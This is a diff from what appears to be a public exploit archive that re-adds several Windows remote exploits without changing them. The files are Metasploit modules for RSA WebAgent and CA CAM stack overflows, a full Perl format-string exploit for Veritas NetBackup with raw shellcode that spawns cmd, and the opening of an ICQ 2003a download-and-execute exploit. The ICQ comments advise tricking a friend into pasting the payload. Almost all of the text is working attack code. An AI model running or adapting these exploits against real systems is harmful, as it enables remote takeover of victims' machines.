+		
+		['RSA WebAgent 5.2 on Windows 2003 English SP0', 996, 0x7ffc0638],
+		['RSA WebAgent 5.3 on Windows 2003 English SP0', 992, 0x7ffc0638],
+
+	  ],
+
+	'Keys' => ['rsa'],
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Check {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return $self->CheckCode('Connect');
+	}
+
+	$s->Send("GET ".$self->GetVar('URL')."?GetPic?image=msf HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");
+
+	my $r = $s->Recv(-1, 5);
+
+	if ($r =~ /RSA Web Access Authentication/)
+	{
+		$self->PrintLine("[*] Found IISWebAgentIF.dll ;)");
+		return $self->CheckCode('Detected');
+	} else {
+
+		$self->PrintLine("The IISWebAgentIF.dll ISAPI does not appear to be installed");
+		return $self->CheckCode('Safe');
+	}
+}
+
+sub Exploit {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target      = $self->Targets->[ $target_idx ];
+
+	$self->PrintLine("[*] Attempting to exploit target ".$target->[0]);
+
+
+	my $pattern = Pex::Text::AlphaNumText(8192);
+	# Just don't ask.
+	$pattern =~ s/\d|Z/A/ig;
+	
+	substr($pattern, $target->[1]    , 4, pack('V', $target->[2]));
+	substr($pattern, $target->[1] - 4, 2, "\xeb\x06");
+	substr($pattern, $target->[1] + 4, length($shellcode), $shellcode);
+
+	my $request =
+	  "GET ".$self->GetVar('URL')."?Redirect?url=$pattern HTTP/1.1\r\n".
+	  "Host: $target_host:$target_port\r\n\r\n";
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+
+	$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
+	$s->Send($request);
+
+	$self->PrintLine("[*] Waiting for a response...");
+	$s->Recv(-1, 10);
+	$self->Handler($s);
+	$s->Close();
+	return;
+}
+
+# milw0rm.com [2005-10-19]
diff --git a/platforms/windows/remote/1262.pm b/platforms/windows/remote/1262.pm
index 09d5870e5..719374b60 100755
--- a/platforms/windows/remote/1262.pm
+++ b/platforms/windows/remote/1262.pm
@@ -1,120 +1,120 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::cacam_logsecurity_win32;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'     => 'CA CAM log_security() Stack Overflow (Win32)',
-	'Version'  => '$Revision: 1.1 $',
-	'Authors'  => [ 'H D Moore ' ],
-	'Arch'     => [ 'x86' ],
-	'OS'       => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
-	'Priv'     => 1,
-	'AutoOpts' => { 'EXITFUNC' => 'process' },
-
-	'UserOpts' =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 4105],
-	  },
-
-	'Payload' =>
-	  {
-		'Space'     => 1024,
-		'BadChars'  => "\x00",
-		'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",	# add esp, -3500
-		'Keys'		=> ['+ws2ord'],
-	  },
-
-	'Description'  => Pex::Text::Freeform(qq{
-		This module exploits a vulnerability in the CA CAM service by passing
-		a long parameter to the log_security() function. The CAM service is part
-		of TNG Unicenter. This module has been tested on Unicenter v3.1.
-}),
-
-	'Refs'    =>
-	  [
-	
-	  ],
-
-	'DefaultTarget' => 0,
-	'Targets' =>
-	  [	  
-	  	# W2API.DLL @ 0x01950000 - return to ESI
-		# $Header: /home/mscvs/framework/exploits/cacam_logsecurity_win32.pm,v 1.1 2005/10/15 14:13:50 hdm Exp $
-		['W2API.DLL TNG 2.3', 0x01951107], 
-		
-		# return to ESI in ws2help.dll
-		['Windows 2000 SP0-SP4 English', 0x750217ae],
-		['Windows XP SP0-SP1 English',   0x71aa16e5],
-		['Windows XP SP2 English',       0x71aa1b22],
-		['Windows 2003 SP0 English',     0x71bf175f],
-	  ],
-
-	'Keys'    => ['cam'],
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target = $self->Targets->[$target_idx];
-
-	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
-
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-	  );
-
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	my $pattern = Pex::Text::EnglishText(4096);
-
-	# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
-	substr($pattern, 1016, 4, pack('V', $target->[1]));
-	substr($pattern, 1052, length($shellcode), $shellcode);
-
-	my $req =
-		"\xfa\xf9\x00\x10" . $pattern . "\x00";
-
-	my $ack = $s->Recv(4, 5);
-	if ($ack ne "ACK\x00") {
-		$self->PrintLine("[*] The CAM service is not responding.");
-		return;
-	}
-	$s->Send($req);
-	$s->Recv(-1,1);
-	$self->Handler($s);
-	$s->Close();
-
-	return;
-}
-
-1;
-
-# milw0rm.com [2005-10-19]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::cacam_logsecurity_win32;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+	'Name'     => 'CA CAM log_security() Stack Overflow (Win32)',
+	'Version'  => '$Revision: 1.1 $',
+	'Authors'  => [ 'H D Moore ' ],
+	'Arch'     => [ 'x86' ],
+	'OS'       => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
+	'Priv'     => 1,
+	'AutoOpts' => { 'EXITFUNC' => 'process' },
+
+	'UserOpts' =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 4105],
+	  },
+
+	'Payload' =>
+	  {
+		'Space'     => 1024,
+		'BadChars'  => "\x00",
+		'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",	# add esp, -3500
+		'Keys'		=> ['+ws2ord'],
+	  },
+
+	'Description'  => Pex::Text::Freeform(qq{
+		This module exploits a vulnerability in the CA CAM service by passing
+		a long parameter to the log_security() function. The CAM service is part
+		of TNG Unicenter. This module has been tested on Unicenter v3.1.
+}),
+
+	'Refs'    =>
+	  [
+	
+	  ],
+
+	'DefaultTarget' => 0,
+	'Targets' =>
+	  [	  
+	  	# W2API.DLL @ 0x01950000 - return to ESI
+		# $Header: /home/mscvs/framework/exploits/cacam_logsecurity_win32.pm,v 1.1 2005/10/15 14:13:50 hdm Exp $
+		['W2API.DLL TNG 2.3', 0x01951107], 
+		
+		# return to ESI in ws2help.dll
+		['Windows 2000 SP0-SP4 English', 0x750217ae],
+		['Windows XP SP0-SP1 English',   0x71aa16e5],
+		['Windows XP SP2 English',       0x71aa1b22],
+		['Windows 2003 SP0 English',     0x71bf175f],
+	  ],
+
+	'Keys'    => ['cam'],
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target = $self->Targets->[$target_idx];
+
+	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
+
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+	  );
+
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+
+	my $pattern = Pex::Text::EnglishText(4096);
+
+	# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
+	substr($pattern, 1016, 4, pack('V', $target->[1]));
+	substr($pattern, 1052, length($shellcode), $shellcode);
+
+	my $req =
+		"\xfa\xf9\x00\x10" . $pattern . "\x00";
+
+	my $ack = $s->Recv(4, 5);
+	if ($ack ne "ACK\x00") {
+		$self->PrintLine("[*] The CAM service is not responding.");
+		return;
+	}
+	$s->Send($req);
+	$s->Recv(-1,1);
+	$self->Handler($s);
+	$s->Close();
+
+	return;
+}
+
+1;
+
+# milw0rm.com [2005-10-19]
diff --git a/platforms/windows/remote/1264.pl b/platforms/windows/remote/1264.pl
index eb9c8410c..f85f7e256 100755
--- a/platforms/windows/remote/1264.pl
+++ b/platforms/windows/remote/1264.pl
@@ -1,339 +1,339 @@
-#!C:\Perl\bin\perl.exe -w
-#
-# Vertias Netbackup Win32 format string exploit
-# Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com
-#
-# For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical
-# For win xp sp2 we overwrote SEH
-# http://www.digitalmunition.com/
-#
-# You may have to run this 2 times. 
-
-use IO::Socket;
-use Getopt::Std; getopts('h:p:t:', \ our %args);
-
-if (defined($args{'h'})) { $host   = $args{'h'}; }
-if (defined($args{'p'})) { $port   = $args{'p'}; }else{$port = 13722;}
-if (defined($args{'t'})) { $target = $args{'t'}; }
-
-
-print "\n-=[Remote Veritas NetBackup Format String exploit]=-\n\n";
-print "\n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunition[dot]com]=-\n\n";
-
-if(!defined($host)){
-print "Usage:
-        -h 
-        -p port 
-        -t target:
-            0 - Windows 2k/Windows XP SP0/SP1 - PEB
-            1 - Windows XP SP2 - SEH\n\n";
-exit(1);
-}
-
-
-
-my $sock = new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto    => 'tcp');
-$sock or die "no socket :$!";
-
-# 970 chars in length. 
-
-
-
-
-
-
-
-
-my $shellcode = "\x90"x100;
-$shellcode .=
-	"\xeb\x42"	.
-	"\x56".
-	"\x57".	
-	"\x8b\x45\x3c".	
-	"\x8b\x54\x05\x78".	
-	"\x01\xea"	.
-	"\x52"	.
-	"\x8b\x52\x20".	
-	"\x01\xea".	
-	"\x31\xc0".	
-	"\x31\xc9".	
-	"\x41"	.
-	"\x8b\x34\x8a".	
-	"\x01\xee".	
-	"\x31\xff".	
-	"\xc1\xcf\x13"	.
-	"\xac"	.
-	"\x01\xc7".	
-	"\x85\xc0".	
-	"\x75\xf6".	
-	"\x39\xdf".	
-	"\x75\xea".	
-	"\x5a"	.
-	"\x8b\x5a\x24"	.
-	"\x01\xeb"	.
-	"\x66\x8b\x0c\x4b".	
-	"\x8b\x5a\x1c"	.
-	"\x01\xeb"	.
-	"\x8b\x04\x8b"	.
-	"\x01\xe8"	.
-	"\x5f"	.
-	"\x5e"	.
-	"\xc3"	.
-	"\xfc"	.
-	"\x31\xc0".	
-	"\x64\x8b\x40\x30".	
-	"\x8d\x78\x20"	.
-	"\x8b\x40\x0c"	.
-	"\x8b\x70\x1c"	.
-	"\xad"	.
-	"\x8b\x68\x08".	
-	"\x89\xee".	
-	"\x31\xc0".	
-	"\x64\x8b\x40\x30".	
-	"\x8b\x40\x0c"	.
-	"\x8b\x40\x1c"	.
-	"\x8b\x68\x08"	.
-	"\xbb\x6f\x5b\x8b\x9c".	
-	"\xe8\x8f\xff\xff\xff".	
-	"\xab"	.
-	"\xbb\xe1\x0f\xfe\xb7".	
-	"\xe8\x84\xff\xff\xff".	
-	"\xab"	.
-	"\x89\xf5".	
-	"\x31\xc0".	
-	"\x66\xb8\x6c\x6c".	
-	"\x50"	.
-	"\x68\x33\x32\x2e\x64".	
-	"\x68\x77\x73\x32\x5f".	
-	"\x54"	.
-	"\xbb\x71\xa7\xe8\xfe"	.
-	"\xe8\x65\xff\xff\xff"	.
-	"\xff\xd0"	.
-	"\x89\xef"	.
-	"\x89\xc5"	.
-	"\x81\xc4\x70\xfe\xff\xff"	.
-	"\x54"	.
-	"\x31\xc0".	
-	"\xfe\xc4".	
-	"\x40"	.
-	"\x50"	.
-	"\xbb\x22\x7d\xab\x7d".	
-	"\xe8\x48\xff\xff\xff".	
-	"\xff\xd0"	.
-	"\x31\xc0"	.
-	"\x50"	.
-	"\x50"	.
-	"\x50"	.
-	"\x50"	.
-	"\x40"	.
-	"\x50"	.
-	"\x40"	.
-	"\x50"	.
-	"\xbb\xa6\x55\x34\x79".	
-	"\xe8\x32\xff\xff\xff".	
-	"\xff\xd0"	.
-	"\x89\xc6"	.
-	"\x31\xc0"	.
-	"\x50"	.
-	"\x50"	.
-	"\x35\x02\x01\x70\xcc".	
-	"\xfe\xcc"	.
-	"\x50"	.
-	"\x89\xe0".	
-	"\x50"	.
-	"\x6a\x10"	.
-	"\x50"	.
-	"\x56"	.
-	"\xbb\x81\xb4\x2c\xbe"	.
-	"\xe8\x11\xff\xff\xff"	.
-	"\xff\xd0"	.
-	"\x31\xc0"	.
-	"\x50"	.
-	"\x56"	.
-	"\xbb\xd3\xfa\x58\x9b"	.
-	"\xe8\x01\xff\xff\xff"	.
-	"\xff\xd0"	.
-	"\x58"	.
-	"\x60"	.
-	"\x6a\x10".	
-	"\x54"	.
-	"\x50"	.
-	"\x56"	.
-	"\xbb\x47\xf3\x56\xc6".	
-	"\xe8\xee\xfe\xff\xff".	
-	"\xff\xd0"	.
-	"\x89\xc6"	.
-	"\x31\xdb"	.
-	"\x53"	.
-	"\x68\x2e\x63\x6d\x64".	
-	"\x89\xe1"	.
-	"\x41"	.
-	"\x31\xdb".	
-	"\x56"	.
-	"\x56"	.
-	"\x56"	.
-	"\x53"	.
-	"\x53"	.
-	"\x31\xc0".	
-	"\xfe\xc4".	
-	"\x40"	.
-	"\x50"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x6a\x44".	
-	"\x89\xe0".	
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x54"	.
-	"\x50"	.
-	"\x53"	.
-	"\x53"	.
-	"\x53"	.
-	"\x43"	.
-	"\x53"	.
-	"\x4b"	.
-	"\x53"	.
-	"\x53"	.
-	"\x51"	.
-	"\x53"	.
-	"\x87\xfd" .	
-	"\xbb\x21\xd0\x05\xd0".	
-	"\xe8\xa8\xfe\xff\xff".	
-	"\xff\xd0"	.
-	"\x5b"	.
-	"\x31\xc0".	
-	"\x48"	.
-	"\x50"	.
-	"\x53"	.
-	"\xbb\x43\xcb\x8d\x5f".	
-	"\xe8\x96\xfe\xff\xff".	
-	"\xff\xd0"	.
-	"\x56"	.
-	"\x87\xef".	
-	"\xbb\x12\x6b\x6d\xd0".	
-	"\xe8\x87\xfe\xff\xff".	
-	"\xff\xd0"	.
-	"\x83\xc4\x5c"	.
-	"\x61"	.
-	"\xeb\x81";
-
-
-#/*
-#7FFDF250    54              PUSH ESP
-#7FFDF251    5F              POP EDI
-#7FFDF252    B8 90909090     MOV EAX,90909090
-#7FFDF257    FD              STD 
-#7FFDF258    F2:AF           REPNE SCAS DWORD PTR ES:[EDI]
-#7FFDF25A    57              PUSH EDI
-#7FFDF25B    C3              RETN
-#
-#and 
-#
-#over write FastPebLockRoutine pointer to EnterCriticalSection with our code address of 7FFDF250    
-#
-#7FFDF020    7FFDF250    
-#
-#*/
-
-print "TARGET IS $target\n";
-if ($target == 0) {
-$c = 8;
-@fmt_array = (
-
-#WINDOWS 2K SP4/XP SP0-SP1
-#OVERWRITE PEB FASTLOCKPOINTER -> RTLEnterCriticalSection
-[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x7FFDF022, 0x7FFDF020 ],
-[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x7ffd, 0xf250 ],
-
-);
-}
-
-
-if ($target == 1) {
-$c = 10;
-@fmt_array = (
-#windows XP SP2
-#OVERWRITE STATIC SEH FRAME
-
-[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x0012ffb0, 0x0012ffb2, 0x0012ffb6, 0x0012ffb4 ],
-[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x9090,0x9090,0x7FFD, 0xF250 ],
-);
-}
-
-
-my $offset = 0;
-my $dump_fmt=6; #amount of %.8x needed to reach stackbase
-my $payload; 
-my $payload2;
-my $hi; 
-my $lo;  
-my $last = 0;
-my $flag = 2; 
-
-my @shift;
-
-for (my $y = 0; $y < $c; $y = $y + 2)
-{
-
-$payload = "%08x" x $dump_fmt;
-$payload2 = pack('l', $fmt_array[0][$y]) . "AAAA" . pack('l', $fmt_array[0][$y+1]);
-
-$hi = $fmt_array[1][$y] - 0x2a - 35;
-$lo = $fmt_array[1][$y+1] - $hi - 77;
-
-$payload .= "%$hi" . "x%hn%$lo" . "x%hn";
-
-print $sock " 118      1\nSNO space filler\n";
-print scalar <$sock>;
-print scalar <$sock>;
-
-print $sock " 101      6\n" .   
-"$payload" . "\n" . # You must finish the line off with a line feed. 
-"dummy space\n" . 
-"$shellcode\n" . 
-"$payload2" . "\n" . 
-"spare bits\n" . 
-"spare bits\n\n";
-
-
-print scalar <$sock>;
-print scalar <$sock>;
-
-}
-
-
-if ($target == 1)
-{
-#create exception so SEH is called
-print $sock " 118      1\nSNO space filler\n";
-print scalar <$sock>;
-print scalar <$sock>;
-
-print $sock " 101      6\n" .   
-"%n" . "\n" . # You must finish the line off with a line feed. 
-"dummy space\n" . 
-"$shellcode\n" . 
-"AAAAAAAAAAAA" . "\n" . 
-"spare bits\n" . 
-"spare bits\n\n";
-
-
-print scalar <$sock>;
-print scalar <$sock>;
-
-}
-
-
-close $sock;
-
-# milw0rm.com [2005-10-20]
+#!C:\Perl\bin\perl.exe -w
+#
+# Vertias Netbackup Win32 format string exploit
+# Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com
+#
+# For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical
+# For win xp sp2 we overwrote SEH
+# http://www.digitalmunition.com/
+#
+# You may have to run this 2 times. 
+
+use IO::Socket;
+use Getopt::Std; getopts('h:p:t:', \ our %args);
+
+if (defined($args{'h'})) { $host   = $args{'h'}; }
+if (defined($args{'p'})) { $port   = $args{'p'}; }else{$port = 13722;}
+if (defined($args{'t'})) { $target = $args{'t'}; }
+
+
+print "\n-=[Remote Veritas NetBackup Format String exploit]=-\n\n";
+print "\n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunition[dot]com]=-\n\n";
+
+if(!defined($host)){
+print "Usage:
+        -h 
+        -p port 
+        -t target:
+            0 - Windows 2k/Windows XP SP0/SP1 - PEB
+            1 - Windows XP SP2 - SEH\n\n";
+exit(1);
+}
+
+
+
+my $sock = new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto    => 'tcp');
+$sock or die "no socket :$!";
+
+# 970 chars in length. 
+
+
+
+
+
+
+
+
+my $shellcode = "\x90"x100;
+$shellcode .=
+	"\xeb\x42"	.
+	"\x56".
+	"\x57".	
+	"\x8b\x45\x3c".	
+	"\x8b\x54\x05\x78".	
+	"\x01\xea"	.
+	"\x52"	.
+	"\x8b\x52\x20".	
+	"\x01\xea".	
+	"\x31\xc0".	
+	"\x31\xc9".	
+	"\x41"	.
+	"\x8b\x34\x8a".	
+	"\x01\xee".	
+	"\x31\xff".	
+	"\xc1\xcf\x13"	.
+	"\xac"	.
+	"\x01\xc7".	
+	"\x85\xc0".	
+	"\x75\xf6".	
+	"\x39\xdf".	
+	"\x75\xea".	
+	"\x5a"	.
+	"\x8b\x5a\x24"	.
+	"\x01\xeb"	.
+	"\x66\x8b\x0c\x4b".	
+	"\x8b\x5a\x1c"	.
+	"\x01\xeb"	.
+	"\x8b\x04\x8b"	.
+	"\x01\xe8"	.
+	"\x5f"	.
+	"\x5e"	.
+	"\xc3"	.
+	"\xfc"	.
+	"\x31\xc0".	
+	"\x64\x8b\x40\x30".	
+	"\x8d\x78\x20"	.
+	"\x8b\x40\x0c"	.
+	"\x8b\x70\x1c"	.
+	"\xad"	.
+	"\x8b\x68\x08".	
+	"\x89\xee".	
+	"\x31\xc0".	
+	"\x64\x8b\x40\x30".	
+	"\x8b\x40\x0c"	.
+	"\x8b\x40\x1c"	.
+	"\x8b\x68\x08"	.
+	"\xbb\x6f\x5b\x8b\x9c".	
+	"\xe8\x8f\xff\xff\xff".	
+	"\xab"	.
+	"\xbb\xe1\x0f\xfe\xb7".	
+	"\xe8\x84\xff\xff\xff".	
+	"\xab"	.
+	"\x89\xf5".	
+	"\x31\xc0".	
+	"\x66\xb8\x6c\x6c".	
+	"\x50"	.
+	"\x68\x33\x32\x2e\x64".	
+	"\x68\x77\x73\x32\x5f".	
+	"\x54"	.
+	"\xbb\x71\xa7\xe8\xfe"	.
+	"\xe8\x65\xff\xff\xff"	.
+	"\xff\xd0"	.
+	"\x89\xef"	.
+	"\x89\xc5"	.
+	"\x81\xc4\x70\xfe\xff\xff"	.
+	"\x54"	.
+	"\x31\xc0".	
+	"\xfe\xc4".	
+	"\x40"	.
+	"\x50"	.
+	"\xbb\x22\x7d\xab\x7d".	
+	"\xe8\x48\xff\xff\xff".	
+	"\xff\xd0"	.
+	"\x31\xc0"	.
+	"\x50"	.
+	"\x50"	.
+	"\x50"	.
+	"\x50"	.
+	"\x40"	.
+	"\x50"	.
+	"\x40"	.
+	"\x50"	.
+	"\xbb\xa6\x55\x34\x79".	
+	"\xe8\x32\xff\xff\xff".	
+	"\xff\xd0"	.
+	"\x89\xc6"	.
+	"\x31\xc0"	.
+	"\x50"	.
+	"\x50"	.
+	"\x35\x02\x01\x70\xcc".	
+	"\xfe\xcc"	.
+	"\x50"	.
+	"\x89\xe0".	
+	"\x50"	.
+	"\x6a\x10"	.
+	"\x50"	.
+	"\x56"	.
+	"\xbb\x81\xb4\x2c\xbe"	.
+	"\xe8\x11\xff\xff\xff"	.
+	"\xff\xd0"	.
+	"\x31\xc0"	.
+	"\x50"	.
+	"\x56"	.
+	"\xbb\xd3\xfa\x58\x9b"	.
+	"\xe8\x01\xff\xff\xff"	.
+	"\xff\xd0"	.
+	"\x58"	.
+	"\x60"	.
+	"\x6a\x10".	
+	"\x54"	.
+	"\x50"	.
+	"\x56"	.
+	"\xbb\x47\xf3\x56\xc6".	
+	"\xe8\xee\xfe\xff\xff".	
+	"\xff\xd0"	.
+	"\x89\xc6"	.
+	"\x31\xdb"	.
+	"\x53"	.
+	"\x68\x2e\x63\x6d\x64".	
+	"\x89\xe1"	.
+	"\x41"	.
+	"\x31\xdb".	
+	"\x56"	.
+	"\x56"	.
+	"\x56"	.
+	"\x53"	.
+	"\x53"	.
+	"\x31\xc0".	
+	"\xfe\xc4".	
+	"\x40"	.
+	"\x50"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x6a\x44".	
+	"\x89\xe0".	
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x54"	.
+	"\x50"	.
+	"\x53"	.
+	"\x53"	.
+	"\x53"	.
+	"\x43"	.
+	"\x53"	.
+	"\x4b"	.
+	"\x53"	.
+	"\x53"	.
+	"\x51"	.
+	"\x53"	.
+	"\x87\xfd" .	
+	"\xbb\x21\xd0\x05\xd0".	
+	"\xe8\xa8\xfe\xff\xff".	
+	"\xff\xd0"	.
+	"\x5b"	.
+	"\x31\xc0".	
+	"\x48"	.
+	"\x50"	.
+	"\x53"	.
+	"\xbb\x43\xcb\x8d\x5f".	
+	"\xe8\x96\xfe\xff\xff".	
+	"\xff\xd0"	.
+	"\x56"	.
+	"\x87\xef".	
+	"\xbb\x12\x6b\x6d\xd0".	
+	"\xe8\x87\xfe\xff\xff".	
+	"\xff\xd0"	.
+	"\x83\xc4\x5c"	.
+	"\x61"	.
+	"\xeb\x81";
+
+
+#/*
+#7FFDF250    54              PUSH ESP
+#7FFDF251    5F              POP EDI
+#7FFDF252    B8 90909090     MOV EAX,90909090
+#7FFDF257    FD              STD 
+#7FFDF258    F2:AF           REPNE SCAS DWORD PTR ES:[EDI]
+#7FFDF25A    57              PUSH EDI
+#7FFDF25B    C3              RETN
+#
+#and 
+#
+#over write FastPebLockRoutine pointer to EnterCriticalSection with our code address of 7FFDF250    
+#
+#7FFDF020    7FFDF250    
+#
+#*/
+
+print "TARGET IS $target\n";
+if ($target == 0) {
+$c = 8;
+@fmt_array = (
+
+#WINDOWS 2K SP4/XP SP0-SP1
+#OVERWRITE PEB FASTLOCKPOINTER -> RTLEnterCriticalSection
+[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x7FFDF022, 0x7FFDF020 ],
+[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x7ffd, 0xf250 ],
+
+);
+}
+
+
+if ($target == 1) {
+$c = 10;
+@fmt_array = (
+#windows XP SP2
+#OVERWRITE STATIC SEH FRAME
+
+[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x0012ffb0, 0x0012ffb2, 0x0012ffb6, 0x0012ffb4 ],
+[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x9090,0x9090,0x7FFD, 0xF250 ],
+);
+}
+
+
+my $offset = 0;
+my $dump_fmt=6; #amount of %.8x needed to reach stackbase
+my $payload; 
+my $payload2;
+my $hi; 
+my $lo;  
+my $last = 0;
+my $flag = 2; 
+
+my @shift;
+
+for (my $y = 0; $y < $c; $y = $y + 2)
+{
+
+$payload = "%08x" x $dump_fmt;
+$payload2 = pack('l', $fmt_array[0][$y]) . "AAAA" . pack('l', $fmt_array[0][$y+1]);
+
+$hi = $fmt_array[1][$y] - 0x2a - 35;
+$lo = $fmt_array[1][$y+1] - $hi - 77;
+
+$payload .= "%$hi" . "x%hn%$lo" . "x%hn";
+
+print $sock " 118      1\nSNO space filler\n";
+print scalar <$sock>;
+print scalar <$sock>;
+
+print $sock " 101      6\n" .   
+"$payload" . "\n" . # You must finish the line off with a line feed. 
+"dummy space\n" . 
+"$shellcode\n" . 
+"$payload2" . "\n" . 
+"spare bits\n" . 
+"spare bits\n\n";
+
+
+print scalar <$sock>;
+print scalar <$sock>;
+
+}
+
+
+if ($target == 1)
+{
+#create exception so SEH is called
+print $sock " 118      1\nSNO space filler\n";
+print scalar <$sock>;
+print scalar <$sock>;
+
+print $sock " 101      6\n" .   
+"%n" . "\n" . # You must finish the line off with a line feed. 
+"dummy space\n" . 
+"$shellcode\n" . 
+"AAAAAAAAAAAA" . "\n" . 
+"spare bits\n" . 
+"spare bits\n\n";
+
+
+print scalar <$sock>;
+print scalar <$sock>;
+
+}
+
+
+close $sock;
+
+# milw0rm.com [2005-10-20]
diff --git a/platforms/windows/remote/1277.c b/platforms/windows/remote/1277.c
index 0f7e13a1e..ba38645f9 100755
--- a/platforms/windows/remote/1277.c
+++ b/platforms/windows/remote/1277.c
@@ -1,123 +1,123 @@
-/*
-*
-* Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit
-* Bug discovered & exploit coded by ATmaCA
-* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
-* E-Mail: atmaca@icqmail.com
-* Credit to Kozan and delicon
-*
-*/
-
-/*
-* Usage:
-*
-* Execute exploit, it will create "bof.txt" in current directory.
-* Open ICQ <= 2003a and click "Add" button
-* "Add / Invite Users to Your Contact List" dialog will be opened
-* Copy the content of "bof.txt" to "First name" and "Last name" fields.
-* Press "find" button
-*
-* Now, icq will download and run your server which you specified in WebUrl field.
-*
-* This exploit requires social engineering skills to use it. For example you should
-* tell your friend that you've found a easter-egg and if he wants to see it he has to
-* type your vuln. string to first and last name fields in icq then press find button etc...
-*
-
-/*
-*
-* Affected versions:
-* Mirabilis ICQ Pro 2003a and prior versions.
-*
-* Tested with :
-* ICQ 2003a Build #3800 on Win XP Pro Sp2
